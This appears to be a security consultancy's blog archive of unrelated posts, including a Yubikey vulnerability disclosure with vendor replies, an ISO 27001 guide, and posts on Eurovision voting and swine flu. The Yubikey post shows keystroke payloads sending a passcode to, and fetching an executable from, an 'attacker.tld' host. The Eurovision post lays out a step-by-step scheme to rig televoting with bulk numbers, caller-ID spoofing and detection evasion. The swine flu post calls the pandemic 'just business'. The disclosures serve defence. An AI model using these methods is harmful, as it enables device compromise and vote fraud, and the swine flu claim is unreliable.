BP Whaling

Update: Today, Swedish media is showing a MOVIE of the same “incident”. This will convince many new people that it is real, since many do not know that movies can easily be faked too. Please have a look and comment what you think.

Why is the picture fake? LINK TO PICS.

1) The skipper does not look at the whale. By looking at the whales shadow in the boat, the whale is in FRONT of the skipper, so it should be in the line of sight. No reaction.

2) The whales shadow in the boat hull does not seem to match the position of the whale in relation to the boat (in terms of distance from the photographer). The whale looks closer to the photographer than would be indicated by its shadow on the hull.

3) The whale shadow area of the hull is partly covered by a white area, like a could. Why would water look like this only on this part of the hull, and not on the other parts of the shadow on the hull?

4) The small amount of water, where the whale is breaking looks strange. A body that large would create much more water in the air. Now it looks like the whale (part of the picture) is from a photo where the whale is already higher up in the air, since you can see the water falling from the its body.

5) The whale looks enlarged compared to the boat. I have no problem with its size, but that part of the picture looks like it has been enlarged quite a lot due to the smoothed out feeling.

6) The background on the before and after picture has changed. This is possible, but a bit strange. Why would the photographer NOT take more pictures from the same angle, given the interesting event.

7) Why is the “after picture” much more enlarged if it is the same camera? (Pictures are credited to the same person as I understand it). On the “before picture”, the boat is totally clear – on the after picture, you can hardly see it, even if it is now presumably not moving anymore.

The photographer is an IT guy. The Skipper is a yoga guy.  ;)

9) There are other videos of whales breaking on canoes and other stuff. These were fake.

10) In the video of the incident – link above. How credible is it that people just laugh and drive away from a boat in that kind of distress?

We are specialized in strategic information security services for business and government agencies.

Have a look at the job description at Linkedin (in Swedish), and Linkedin (in English – automatic translation).

Here are the issues mentioned in an earlier post here at Security.dj and Yubicos’ answers to these:

Yubikey is not a read-only device. Its internal configuration is unprotected.
The configuration can be protected by an optional 48-bit password. A large percentage of the customers who order a small number of Yubikeys are experimenting and rewriting the configuration. If all keys were programmed with a configuration password, this would make experimenting more difficult and potentially lead to customers killing their keys if the configuration was lost. Bottom line is that this setting is intentional and the users who want to have its configuration protected can easily enable this option. Customers who order a larger number of Yubikeys can optionally have the configuration password set according to their specific needs, i.e. randomized, linear, from file, a single fixed value etc. It is worth mentioning that deploying unprotected Yubikeys does not affect the security per se, as configuration data is write-only, i.e. it cannot in any way be read back from the Yubikey. The risk is rather that the Yubikey is open for sabotage, i.e. the valid / legitimate configuration is overwritten or deleted.

Yubikey can create and send passcodes over the Internet without you pressing the key.

The YubiKey 1 included an option to generate the one time pass-codes by a double click on the caps-lock or num-lock buttons on the main keyboard. It seems however as this feature is not used and the function has been removed in Yubikey 2. It is however important to understand that even for Yubikey 1, this feature needs to be explicitly enabled. Users who don’t like the function shall therefore leave it disabled.

Yubikey-generated one time passcodes are valid regardless of time.

Only partly true as the pass-codes also comprise a timer component that can be used to detect the time delta between two codes generated. Furthermore, as all old pass-codes get invalidated each time a new one is generated and authenticated, codes do have a practical limited lifetime in most settings. We recommend users who are concerned of a potential “store-and-forward” attack to design their service in such a way that the user generates at least two pass-codes during a critical session. A good parallel is Internet banks where the user can log on and make simple transactions just by using a username and password. If, for example funds are to be moved to a foreign account, the user will have to log on using a token. When the fund is then later to be committed, the token must be used again. A similar scheme would be perfectly usable for the Yubikey as well. The functionality for detection time delta will be fully implemented in the Yubico hosted  validation server during Q4 2009.

Yubikey can be used to download and execute malicious code on computers

The “automatic navigation” feature was implemented for pure convenience. As the function does not work reliably for all platforms and has some potential security aspects as indicated, this function has been completely removed from firmware 1.3.6. It is worth re-stating that there is no memory storage on the Yubikey like with an USB memory stick. This means that Trojans / malicious code cannot be stored or injected into the Yubikey.

A Yubikey lost means the passcode revealed, since it has no lock.

In the default One Time Passcode mode, a lost YubiKey can be disabled on the validation server. In the “static pass-code mode” is an optional feature that a fair amount of users appreciate as it works right away with legacy systems. As this is a static code it certainly has its weaknesses and shall therefore only be used when the user is fully aware of these limitations.

The Yubikey validation service is not backed by the vendor – it is offered as “best effort”.
The Yubico validation server is a free service that was initially designed as a “proof of concept” only. As more and more users have asked for a more reliable and secure server, Yubico has completely re-designed the architecture and key lifecycle management procedures. The server has furthermore been moved to a physically more secure server location, used by leading Swedish financial institutions. We recommend  customers who are concerned about security and reliability as a part of their overall service concept to run their in-house validation server.

Attackers have access to the source code and documentation of the validation server.
We strongly believe that the open source approach makes the system in whole more secure as it is open to public scrutiny. There should not be any “by-design weakness” in the setup that would justify keeping anything secret. The “security by obscurity” approach is not considered best practice by the security industry.

Unused features that can be used as attack vectors are left in the firmware.
As stated earlier, the “automatic navigation” and “keyboard trigger” features have been all removed in firmware. All functionality is properly described in “The Yubikey manual” Users must of course be aware what it means to enable specific features from a security- and systems perspective.

WHO today upgraded the Swine Flu to a Phase 5 (out of 6) in terms of Pandemic risk.

Just to put things in perspective:

1. Tuberculosis is a deadly infectious disease caused by mycobacteria. In a given year, ca 1.800.000 people DIE from it, and many many more catch it.
2. The general influenca (the flu) that goes around the world takes ca 250.000 to 500.000 lives EVERY year.
3. One million people die on world’s roads in traffic accidents every year.
4. It takes 20 seconds to read this article to this point. During this time 20 people died of starvation. In fact, 36.000.000 people die from starvation in a given year.

So far this Swine flu has killed less than ten people (confirmed).

Hello! Calm Down. Relax and enjoy life.

Swine flu is not a major threat for you. It is just business.

Edit: WHO has later upgraded the Swine Flu to a Phase 6 (out of 6) in terms of Pandemic risk. Help!

I have just finished reading the verdict today from the Pirate Bay trial that gave the defendants a year each in prison and 3 million euros in damages to pay for running the bittorrent site the Pirate Bay in Sweden. It is a well written verdict, and the arguments seem well-founded in the current Swedish law, barring for the somewhat loose connection between the crime and some of the defendants.

I am not here to discuss the politics of file-sharing, but I found an interesting angle in the 107-page document that I think will be one of the future foci as the trial and the debate goes on into other stages: The European Directive concerning electronic commerce.

Article 12

It is interesting to note that the court decides that the Pirate Bay is such a service for the “information society” that is covered  by the 2000/31/EG directive. Wow – this must be great news for the Pirate Bay guys, since it is – as I see it – the only way that this verdict will be changed in the later stages in its totality (and not only for some of the defendants).

Here is a summary of the applicable legal text (full text here):

2000/31/EG directive Article 12 – “Mere conduit”

1. Where an information society service is provided that consists of the transmission in a communication network of information provided by a recipient of the service, or the provision of access to a communication network, Member States shall ensure that the service provider is not liable for the information transmitted, on condition that the provider:

(a) does not initiate the transmission;

(b) does not select the receiver of the transmission; and

(c) does not select or modify the information contained in the transmission.

2. The acts of transmission and of provision of access referred to in paragraph 1 include the automatic, intermediate and transient storage of the information transmitted in so far as this takes place for the sole purpose of carrying out the transmission in the communication network, and provided that the information is not stored for any period longer than is reasonably necessary for the transmission.

In essence the court argues that this article quoted above is not applicable, even though they see Pirate Bay as an information society service that is thereby covered by the directive. The reason is, according to the verdict that

The purpose of Pirate Bay’s services was e.g. to provide server space so that users could upload and store torrent-files on the web site. This storage means that Article 12 (in Swedish law paragraph 16) – that only covers services where some form of automatic and temporary storage (cacheing) takes place … is not applicable. (from the verdict)

Basically they argue that since the possibility to upload and store torrent-files is provided, another article is applicable. This other article does not give the Pirate Bay guys freedom from liability.

Why article 12 may be applicable

However, I can see some strong arguments for that it is applicable, now that the court sees the Pirate Bay as a provider of services for the information society. Here is a first stab at a line of argument:

1. The information that is uploaded is not the protected works, or any parts thereof, but pointers and references to places that may know where parts of that work may (or may not) be found.
2. The BitTorrent technology is a communications protocol, where the torrent-files (that are uploaded to Pirate Bay) are a part of that communications
3. The role of the torrent file in BitTorrent communications is only to enable communication to take place between parties sharing files. Therefore, a torrent file should be viewed as information that has the “sole purpose of carrying out the transmission in the communication network”, in the directive.
4. The directive seems to be written with communication between primarily two parties communicating for a given limited duration in time. However, the idea with BitTorrent is to enable many to communicate with many for a longer duration.
5. This is where the court might get things wrong: The directive says that the provider should be without liability if 1) they only store information needed for the communication to take place (which is argued above), and 2) only stores this information for a time needed for the “transmission to take place”, and 3) if this storage is “automatic, intermediate and transient”.
6. Since the BitTorrent transmission, as per definition by the communications protocol, takes place potentially unlimited in time and between many parties, it must be concluded that an operator or provider of such a service must store the torrent-files indefinitely, or at least longer than what the court labels “temporary”.
7. The directive does not give a limit in the length of time the information can be stored – it only says it can be stored for a “reasonable time to complete the transmission”.
8. The court’s argument it that the storing of torrent files are not “automatic and temporary”, and that’s why the Pirate Bay guys are still liable.
9. And here is the end of my argument: The directive specifies further what it means by “automatic, intermediate and transient storage of the information transmitted” by adding “in so far as [the storing] takes place for the sole purpose of carrying out the transmission in the communication network, and provided that the information is not stored for any period longer than is reasonably necessary for the transmission”.
10. From the perspective of Pirate Bay as a provider, the uploading of the torrent files by users to enable communication between parties is “automatic, intermediate and transient” insofar that user’s torrent clients create the torrentfiles and uploads them to Pirate Bay to enable communication, the files are an integrated and unseparable part of the communications protocol, they are intermediate in that they are only there to broker the communications, and transient insofar as they only need to exist as long as the transmission takes place (which might be indefinately).
11. Therefore, since the purpose of the information in the torrent files are to enable communication between parties, and since they are stored at the Pirate Bay only for the purpose to carry out the transmission, and only during that time than is reasonably necessary for the transmission, article 12 is applicable.

I am sure that Swedish and European copyright laws can be changed to the better.  But as long as we have the laws we have, all should strive to adhere to them. It is not totally clear to me that the guys behind Pirate Bay have committed any crimes (at all), but we know that many users of their service have done so. This post does not argue that stealing other parties intellectual property is a good thing, or that Pirate Bay is a good (or a bad) thing

In conclusion, I think the court was a little too quick to dismiss the idea of the directive’s article 12 that the provider is without liability in certain circumstances, since these circumstances seems to be fulfilled. Especially since the court writes that they see the Pirate Bay as covered by the directive in itself. I am surprised that no old media has discussed this, since it it also at the heart for the question: Is the Internet still legal after this?

We have recently witnessed how virtualization of servers and clients have transformed how we think about information processing. Today, we all understand that the information we see at our computer screen can reside anywhere in the world. The application and software we use can be somewhere else. Nevertheless, we use it here and now. Call it Cyberspace, virtualization or the Cloud – most of us use it every day.

What has happened? Information processing has been totally released from its boundaries in terms of geographical location. The only limit is the bandwidth used to transfer the information from the place of processing to where we are for the moment. Since the bandwidth capacity available to us continues to increase really fast, we can almost discount that as a limitation in the near future.

But we are still not “free”. There is something that limits the use of information and communication technologies today. That is the interface we have to the information. We continue to carry around small mobiles and laptops. We continue to read small screens and punch in text messages in small keyboards. All this to simulate the “limitless” mobile life. But we are not there yet.

The way we interface with information and communication systems is about to change. This, I think, will be the next big communication revolution.

Pretend for a moment that you had access to the same Internet-based services and your software on your computer and mobile without having to carry them around. You could interface with these services and control them using your voice, gestures, or even thoughts. No keyboard needed.

But not only that; there would be no screen to look at. The screen will be replaced with small gateways or we can call them translators between the systems and you. You might perceive the services by hearing the results of a command, or seeing the results like if they were projected like superimposed images in your sight, in what you see right now.

What will enable this radical change is again that technology has made it possible. Speech recognition and facial recognition is developing fast, as is speech synthesis. Screen and projection technologies are also developing at a rapid pace, as is wireless network connections.

Take a small wireless netbook – this gives you a great feeling of freedom today. Well, tomorrow you will not need to punch in the commands at the keyboard – you will just say them, show them, or (later) think them. You will not need to look at the screen to see the answer – just listen, or just watch the information you asked for projected in your own sight – right there in front of you.

Implications for security

All these developments give rise to important information security implications:

1. Protect objects (information and services) as close to the source as possible, since it will be everywhere. E.g. encrypt your information before you send it to the cloud or out in space.
2. Decide on access rights for subjects (people or processes) as close to the subject as possible, since both objects and subject will not be bound by time or space. E.g. use biometrics to ensure that the person accessing the information or service is the person expected.
3. Lars Söderlund at Alliansor: The move towards thinner clients, with decreased storage and processing power at the client side, will increase the importance of availability of network connectivity as a part of information security.
   
4. Your ideas here….

Please help develop these ideas by commenting this article. I will update the article using your comments.

My daughters, 6 and 8 years old, are very interested in the Eurovision Song Contest, which is a huge thing in Sweden. The Swedish final yesterday had close to 3.5 million viewers, which means that ca 40% of the Swedish population were watching.

My daughters, smart as they are, asked me about the voting system security. This is their first “democratic” election, so it is very important to them that their votes count and that there is no foul play. Maybe we should care about this, even though it is only a TV show? For many young people of Europe, this is their first election they participate in. What would happen to their view on democratic elections if they could not trust the outcome of this very first one for them? Since I am working with securing general parliament elections, I thought I give this some thought too. Here is what I found:

The rules

The rules for Eurovision Song Contest are posted here. However, the rules regarding the televoting are partly removed in this version. Hungary published the whole text here. Rules in summary:

• You can’t vote for your own country.
• Voting is via SMS text messages or telephone and shall be counted during a fixed time period.
• Scores of the songs in the Grand final shall be calculated on the basis of both the results of the televoting and the results of juries appointed.
• There is a backup routine where the Executive Supervisor of the European Broasdcasting Union can decide during the final that no votes should be counted, and that only the jury’s votes will decide the winner.
• “Each Participating Broadcaster shall do its utmost to prevent fraudulent voting in the Shows. It shall give full access to any EBU international monitors who may be sent to oversee all aspects of the televoting procedure, on any territory, with no notice given. The EBU and the Reference Group shall rule on the sanctions to be imposed on a broadcaster found to have participated, either actively or complicity, in any voting fraud”.

What the rules do not say

The official rules posted do not say what constitutes fraudulent voting. Since everyone can vote several times, 10 votes would probably not be considered fraudulent. 100 votes from me on my sister, if she would participate, would probably not be considered fraudulent. But would 1.000 votes? 10.000? 100.000? 1000.000? There is said to be a technical limit of 20 votes per “telephone number”. But today, having many phonenumbers is not like it used to be. You can have thousands of numbers tied to one single subscription for a very low cost (in this example 100 swedish numbers for 290 euros), or you can fake your CallerID using several different methods. You can come from anywhere on the Internet you choose, from whatever IP-number. It is VERY difficult to create a secure voting system in this environment.

The artists are like athletes. They are there to win. They have record companies behind them, and a team that is working with their act, their marketing, and everything the possibly can do to win. Winning is depending on the televoting. Given these circumstances, it would is only natural if each team give the voting system and the rules some thoughts. This is a game. The winner will of cause know the rules inside out and play the game as good as possible within the rules. The problem is that “fraudulent voting” is not defined for the voters, and we decide the televoting!

Ways to manipulate the voting system

You can manipulate the voting system without breaking any of the officialy posted rules. Morally, this would be wrong. But legally, it would be perfectly ok.  Without going into any technical details, here’s how:

1. Take an ordinary Laptop computer.
2. Register for a telephone line from an Internet telephony (VOIP) provider with several phone numbers (low cost) for outgong calls in the country were you want to vote (you need n=x/20 numbers, where n=numbers, and x=the numbers of votes you want to generate).
3. Remember; smaller countries with less interest for the song contest and lower voting fees will be less costly win.
4. Download Trixbox or any other free telephone exchange and automation suite. Make sure trixbox registers as your SIP-client (as your telephone) with the Internet telephone provider (you have to get the password from the provider).
5. Get the numbers for your artist from the web sites of the song contest (published the day before).
6. Use the functionality in trixbox to dial 100 or 1000 parallel voting calls until you have reached the number of votes you need to win in that country (check the official results from last year to find out how many you might need).
7. Make sure that calls are made from different numbers, maximum 20 votes per number.
8. Do this for each of the countries you want to win in (No need to go to Ukraine to get a phone number there to call from – you can sign up in your own country for any country).
9. For countries with SMS text voting; Get many anonymous pre-paid mobile SIM cards from different countries you want to win (often without any starting fee).
10. Connect these to a computer (you will need multiple SIM card readers) and start to fire away SMSs using an SMS application were you can set the message, recipient, and the number of times it should be sent.

In short, as a voting system – there is very little security. Just get over it. Eurovision Song Contest can be won by the highest bidder this time. You can “buy” the country you want to win. And as far as I can see this is according to the rules. The boradcasters even tell you straight out to vote as much as you can for your artist. However, the technical limit of maximum 20 votes per voter makes can make it quite expensive.

As an example, the difference in votes separating the artists Caronline af Ugglas (second place, 318.952) and Malena Ernman (winner, 322.657 votes) in the Swedish final for 2009 was 3.705 votes. Caroline could have won instead of Malena using just an ordinary laptop with trixbox for total voting cost of roughly 1500 euros, a cost for phone numbers of 537 EUROS ( 3705/20 * 2,9 euros ) and some preparation time.

Can fraudulent voting be detected

Yes, it is possible through logs that exist in the pan-European Televoting Platform operated by Digame Mobile. However, since the voting is spread out in different countries and on different networks and then aggregated, it makes the auditing quite technically complex. For this year’s national competitions, both Spain and Portugal removed thousands of fraudulent votes afterwards. But where is the driving force to take about voting problems in the Grand Final? None.

For a televoting fraud like this to succeed, the fraudsters would have to find a way around the 20 votes per number limit. This could be done through buying many numbers (as in the example above), getting temporary access to a (small )telephone operator’s unused number series, or by faking the voter identity in a way do that the pan-European Televoting Platform believes that is indeed a different voter (fake IP-numbers through proxies if needed and fake CallerID through a service or using the IAX protocol, or whatever else that works).

Another method to get less attention is to make the thousands of calls at irregular intervals (we are talking milliseconds here), so that any automatic detection system does not kick in because it understands that it is not regular calls or messages.

Televoting future

If a major televoting scam is seen, then this might be the end of televoting for the song contest. Maybe this is good.

So what shall I tell my daughters now? I will have to explain to them that this election might be rigged and bought, but the election to the parliament is secure. Yes, that is what I will say. Democracy works, but only when it really needs to.

Summary

This article explains the management review of an organisations’ information security management system that is mandated by the international standard on information security management, ISO 27001. It might be of interest of information security managers and those seeking to implement the ISO 27001 standard.

Agenda

-    What is the “management review of the ISMS” in the context of ISO 27001?
-    What are the roles involved in the management review?
-    What is the purpose and rationale behind this requirement?
-    What are the steps that we need to take in order to fulfil this requirement?
-    How can the results of the management review be documented?

Definition

The “management review of the ISMS” in the context of ISO 27001 refers to the annual activity where management reviews the organization’s information security management system (ISMS), ensuring its continuing “suitability, adequacy and effectiveness” (ISO 27001).

Requirement

The requirement as stated in ISO 27001, chapter 7:

Management shall review the organization’s ISMS at planned intervals (at least once a year) to ensure its continuing suitablity, adequacy and effectiveness. This review shall include assessing opportunities for improvement and the need for changes to the ISMS, including the information security policy and information security objectives. The results of the reviews shall be clearly documented and records shall be maintained

Each of ISOs management systems standards, including ISO 9001 (for quality management systems) and ISO 14001 (environment management systems) have a corresponding requirement that mandates a management review. In fact, the whole idea and the concepts use to describe the management review is directly derived from ISO 9001.

Roles

Management. Management here refers to the group of individuals who has the widest authority in the organization, and essentially control the operations with their decisions. They are concerned not only with information security, but also with the overall aim of the organization. Because of this, they are in the position to see the overall picture and judge weather or not the information security management system is suitable, adqeuate and effective in relation to the current strategies and the road ahead.

Information security officer. However, management need the help of a good information security manager or officer (CISO) in order to review the management system. In fact, most often management do their role in this review by attending one meeting and making some important decisions. It is the information security manager who has to plan this meeting; to gather its inputs, to fascilitate its processing, and to take care of its output.

Rationale

The idea behind this requirement for those seeking ISO 27001 certification is that:

• Management commitment: High level management commitment is crucial for running a successful information security effort in any organization, therefore they should be involved in taking the decisions so that their executive power is transferred to the information security people.
• Track development: One of the ideas behind having an information security management system is that high level management is able to track the development of information security in their organization.
• Reserve resources: High level management’s decisions are needed to get reserved resources for information security, after prioritizing security against other possible alternative investments.

Steps

There are three major steps involved in order to conduct a management review successfully:

1. Review input: Preparing information for the meeting
2. Meeting: Presenting the information, discussing, and getting approval
3. Review output: Documenting decided changes to documents and controls

Review Input

The input to a management review shall include:

a)    Results of ISMS audits and reviews;
b)    Feedback from interested parties;
c)    Techniques, products or procedures, which could be used in the organization to improve the ISMS performance and effectiveness;
e)    status of preventive and corrective actions;
f)    vulnerabilities or threats not adequately addressed in the previous risk assessment;
g)    results from effectiveness measurements;
h)    follow-up actions from previous management reviews;
i)    any changes that could affect the ISMS; and
j)    recommendations for improvement. (ISO 27001)

Meeting

One natural way to organise the meeting is that the information security manager presents the information in the review input. It should be possible for the management to complement the presentation by looking at and reading actual reports and other review inputs during the meeting.

After the review inputs are presented and discussed, the information security manager gives his/her recommendations for changes, priorities and improvements, and describes the need for financial and other resources.

The result of the meeting is a set of agreed changes / decisions, including the reservation of resources. These actions and decisions are listed here below as review outputs.

Review Output

The output from the management review shall include any decisions
and actions related to the following :

a)    Improvement of the effectiveness of the ISMS.
b)    Update of the risk assessment and risk treatment plan.
c)    Modification of procedures and controls that effect information security, as necessary, to respond to internal or external events that may impact on the ISMS, including changes to:

1)    business requirements;
2)    security requirements;
3)    business processes effecting the existing business requirements;
4)    regulatory or legal requirements;
5)    contractual obligations; and
6)    levels of risk and/or risk acceptance criteria.

d)    Resource needs.
e)    Improvement to how the effectiveness of controls is being measured. (ISO 27001)

Documentation

The meeting should be documented in terms of the inputs, the recommendations and the outputs. On way of doing this is that a powerpoint-template of used for the management review presentation every year, including the sections listed in review inputs and outputs aboove. Each section for the inputs are filled with information avout the current state by the information security manager before the meeting. Each sections for the putputs are filled in during the meeting as they are agreed. In addition, there should be a protocol from the management review meeting which lists the date, the participants, and what was agreed. This protocol should be signed by a representative for the top management of the organisation.

About the author: Dr. Fredrik Björck (CISA, CISSP) has been working with information security management systems and certification since 1997, in academia and as an auditor and consultant. He is founder and CEO of Visente, a consultancy specialising in strategic information security advisory services. Visente has taken the first government authority in sweden through ISO 27001 certification, and has helped the Swedish Standards Institute with the Swedish translation of the ISO 27001 and 27002 standards. This article is a part of Visentes’ knowledge sharing initiative fo the benefit of a more secure society.

Yubikey

Quick Summary

NOTE! (Added 2009-08-30): Please note that most of these security issues described in this article are now fixed, or the risk reduced. Please read this post for more information.

• Yubikey is not a read-only device. Its internal configuration is unprotected.
• Yubikey can create and send passcodes over the Internet without you pressing the key.
• Yubikey-generated one time passcodes are valid regardless of time.
• Yubikey can be used to download and execute malicious code on computers.
• A Yubikey lost means the passcode revealed, since it has no lock.
• The Yubikey validation service is not backed by the vendor – it is offered as “best effort”.
• Attackers have access to the source code and documentation of the validation server.
• Unused features that can be used as attack vectors are left in the firmware.

What is Yubikey?

Yubikey is a security device from the innovative Swedish startup Yubico. It is a very small piece of hardware, in the form of a USB key that fits on your key chain. What makes Yubikey so smart is that it does not need any client software and it can be used on all computers that have a USB slot.

The intended use is for secure and efficient authentication of users to services over the Internet. It works just like a computer keyboard connected to a USB slot. In fact, it is more or less a computer keyboard, since all it does is to simulate a keyboard in order to enter long passwords into textboxes when you want to login to for example a web site.

The Yubikey has one button. If you insert the Yubikey into a computer and press this button, it generates the user’s identity and a passcode, just like if you would have written it yourself on the keyboard. It is possible to re-program a Yubikey to for example generate static (never changing) passcodes instead of the default which are so called one time passcodes (hereafter called OTPs).

The Yubikey is used for applications such as to login to single-sign-on services such as OpenID and MashedLife.com, Windows, blogs, forums, and more. In most cases one time passcodes, OTPs, are used and validated against some validation server. The yubikey can also be used completely offline without validation, for example to enter a complex but static passcode to unlock an encrypted disc that is protected with TrueCrypt.

Introduction

I recently ordered five Yubikeys with the intent to evaluate this system as a potential secure login mechanism for some of my clients. This blog posting is the result of that evaluation. As will be clear below, I found the Yubikey to have some critical security weaknesses. All of these security weaknesses can be corrected, some with very little effort.

Remember that Yubico is a startup company. They were taken by surprise by the high demand for their product. The Yubikey firmware and software (validation server) are both somewhere between development and testing in terms of maturity. It is not production ready. This is problematic since it is not always clear that this is the case, since Yubikeys are sold to end-users that use them to login to valuable information assets, with Yubicos validation service at the back-end.

Below, I list a number of security weaknesses of the Yubikey. The severity of these weaknesses might vary with the users’ knowledge, the Yubikey firmware version, the validation server version, and the intended use. The evaluation is based on reading the official Yubikey documentation, communicating with Yubikey support via e-mail, reading the Yubico forum and wiki, and testing.

Yubikey Weaknesses

A stolen one time passcode is valid for authentication until the next time the real user uses the Yubikey.
The Yubikey is equipped with an internal timer that is used to calculate the time difference between the generation of two subsequent one time passcodes (OTPs) during one Yubikey session. However, since there is no battery for the timer in the hardware (compare with e.g. secureID which has a timer and battery) it is only possible to use this internal timer if the user is requesting two OTPs. For a normal login, you might use only one OTP, then this means that there is no certain time limit that stipulates how many seconds, minutes or hours that OTP is valid. Consequence: An attacker that have managed to acquire a OTP can have hours, days, or even months to use it, since it will be valid until the legitimate user uses the Yubikey again. It is important to note that the attacker does not need the Yubikey for anything – only the OTP. In summary: The last unused OTP does not expire until the Yubikey is used again, unlike for example those OTPs generates by SecureID. (Source: Derived from communication with Yubico support).

Validation servers that are currently deployed have a security flaw
According to a discussion at the Yubico forums, some Yubikey users found that they could generate for example five OTPs, and then authenticate with these five keys over and over again. Yubico employed developers found that “OTPs that were generated while the key remained inserted then OTPs within that session could be replayed without detection until next removal and insertion of the Yubikey. The reason was that the Yubikey counter for “session use” was not checked by the server”. For earlier firmware versions (pre 1.3.3), the validation server was checking the timestamp instead of the session counter, but this was dropped! due to incompatibility with firmware 1.3.3. This bug is now very quickly fixed in the Yubico validation server source code on 2009-02-07 – session use is checked (but not timestamp) . The current release of the server available for download here (2009-02-21) is not updated, and thus still vulnerable (Update 2009-02-23 – new server version 1.1 available, see end of article). This release has been downloaded over 200 times, and it is still available for download. Yubico has not communicated this issue to its user base clearly. Therefore, it is very likely that most validation servers in production are still vulnerable. It is also likely that more people will download the vulnerable server. Consequence: Even if the scenario is that all users only generates a OTP once every session (as long as the key is attached to the computer), this is still a very serious flaw, since the protection earned by using a one time passcode is lost because an attacker can reuse it, even if it is only seconds or minutes later. Even when this vulnerability is completely fixed, the other related weakness described above is still present, since it it a part of the design. (Source: Yubico forums)

The yubikey is delivered without programming password set.
Anyone with access to any computer where a user inserts their Yubikey can reprogram the key. This does not need to be a security problem, if all customers were informed about this fact, and that they should lock their key. However, there is no information about this in the shipment from Yubico. Consequence: Some users, who do not understand or care too much about how the Yubikey works, will be unprotected from the reprogramming of their Yubikey by a malicious user or software. This is important since the user should be able to trust the key (it is the security device) in an otherwise unsecure environment. The idea is to be able to access for example the company network from an Internet Café with unsecured computers. (Source: Programming test)

The automatic navigation feature can be used by an attacker.
The Yubikey features a function called “automatic navigation”. This function tells the computer to start its default web browser and take the user to a preconfigured URL and optionally generate and send a one time passcode (OTP). This is used by for example MashedLife.com for their single-sign-on service. There is a risk that an attacker might change an unprotected automatic navigation feature to point to another URL, and thereafter emit a valid OTP. Subsequently, three seconds after the next insertion of the key, it will navigate to the attacker’s site and emit a valid one time passcode that the attacker can use to authenticate as the user (http://www.attacker.tld/otp?thisisthesecretpasscode). Neither the attacker nor the user needs to do anything in order to transfer this code – it will end up in the attacker’s web server error log in clear text seconds after the user inserts the key into the computer, without any buttons to press. This re-configuration is possible since Yubikeys are delivered without the programming passcode set. In addition, according the current Yubikey Personalization Tool Guide 1.5, the automatic navigation feature would still not be protected even with this passcode. It reads “Also note that the programming password is not required to reconfigure the “Automatic Navigation” feature.” To sum up: This security device has a built-in feature that generates a one time passcode that is valid potentially unlimited in time, and sends it off as a part of a HTTP GET request to any URL someone with access to any computer where the Yubikey is inserted into decides. Yubico support says they might drop this feature on later firmware revisions. (Source: Derived from information in Yubikey Personalization Tool Guide 1.5 and Yubico code examples). (Update 2009-02-23 -  Yubico has plans to solve this in firmware 1.3.4, see below).

The automatic navigation feature can be used to execute arbitrary code.
Since the feature “automatic navigation”, discussed above, is emulating a keyboard pressing the “windows”-button plus “r” to execute “http://www.site.com”, it can also be used to run arbitrary code residing on the computer or to download code. Since it is a keyboard from the perspective of the computer, it can also press OK or Enter to confirm the running or installation of malicious code. This is something new for malware to try – probably never seen before. Consider [win]+[r]+’http://www.attacker.tld/update-yubikey-firmware-134.exe’+[CR] (carriage return) or some other combination. With a combination of [tab] and [enter], all controls asking “do you really want to run this?” can be bypassed. I have not tested how complex sequences one can execute. Also, there might be differences in different firmware versions. It is clear that the Yubikey API allows for programming the keyboard to “press” different buttons. All the attacker’s commands are then run (or rather keys are pressed) three seconds after the key is inserted into the computer. (Source: Yubico forums and Yubico Support E-mail). (Update 2009-02-23 – This will also be solved by the new planned firmware 1.3.4).

Open source of code makes it easier for attackers.
Although it is very handy that Yubico have open sourced code including the validation server and code examples for programming the key, as well as information about the Yubikey API, it is also much easier for attackers to write malicious code that reconfigures the Yubikey in the way described above. There are many code examples available to start from. Given the lack of maturity of the published code that is compiled into validation servers, it is also easy for an attacker to find potential flaws that can be exploited (Like the flaw discussed earlier). (Source: http://code.google.com/search/#q=yubico).

With physical access to the key, there is no protection of the passcode.
Using the key in static passcode mode, this is the equivalent of having a paper in your wallet which says “The passcode is [your passcode]”, since anyone with physical access to the key can put it into a computer and press the button to get it. In one time passcode mode the passcode generated will be valid for login at least as long as the hacker authenticates before the legitimate user. The attacker with physical access can quickly take a key and put it into their computer or mobile and press the key and save the passcode in a text file for later usage. In some use cases there are additional secrets to be entered upon login, then this scenario does not work. It is important to inform the users about this, so that they are not under the impression that you need the key device to login. This is not a security flaw, but something that all users should understand.

Recommendations for increased security

1. Ship all keys that are sent to end-users with programming password set, and provide them with the password.
2. While shipping keys for testing, development and to resellers, be clear to inform the buyer in writing that the keys are not protected from reconfiguration and that they must be protected before sent off to end-users.
3. Disable the automatic navigation feature on in the default firmware version and let customers decide if they want this when they order, after explaining what it is and the risks with having it in a security device (this is not the case today according to Yubikey support e-mail, 2009-02-14)
4. Make sure that the programming password does protect against changes in the automatic navigation feature (page 17 in the Yubikey Personalization Tool Guide 1.5 states that this is not currently the case, 2009-02-14).
5. Set up a rigorous quality assurance process for the development of the validation server and other critical system components, to make sure that current flaws are fixed and that new ones do not find their way into production.

Yubikey is a really good idea, and an interesting product. Do not let this evaluation discourage you from using Yubikey. By having read this post, you will have knowledge to avoid some of the security weaknesses listed above.

Please expand, correct or just comment. Any communication from Yubico will also be published here if they want that.

Latest developments

2009-02-23: Yubico have considered the recommendations above and they now have plans to enable a protection for the automatic navigation feature in the 1.3.4 firmware version which will be in production from the March 5 batch and onwards. This means that if a programming password is set, then it will not be possible to change autonavigation information at all. However, it is surprising that the leave the feature in the firmware. It leaves the key open to DNS issues (attacker with write access to a computer where the key is used controls the DNS or puts a hosts-file which points the autonav URL to attackers IP-number and emits a valid OTP) and brute-force attacks where the programming password is cracked and the autonav information changed.

2009-02-23: There is a newly built version, 1.1, of the validation server available from today that does not include the security flaw that enables the replay attack described above. This will decrease the risk that these flaw finds its way into new validation server installations. However, given that the vendor only offers the validation service as a “best effort” service, it is likely that we will find more flaws soon, in validation server components and the YMS web interface. Remember – this system is not in production – it is not backed by the vendor.

2009-08-30: There is a new firmware version out the dropped the autonavigation feature. Other security improvments as well. Please look at this new post.